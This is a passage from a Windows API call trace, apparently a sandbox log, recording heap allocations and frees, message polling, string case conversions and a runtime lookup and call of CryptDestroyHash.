Flags=0x0, Size=0x8) returned 0x24b2058 [0267.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.223] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0267.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0267.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0267.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.227] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0267.227] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.228] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.228] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.228] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0267.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e50, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.232] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.232] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0267.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 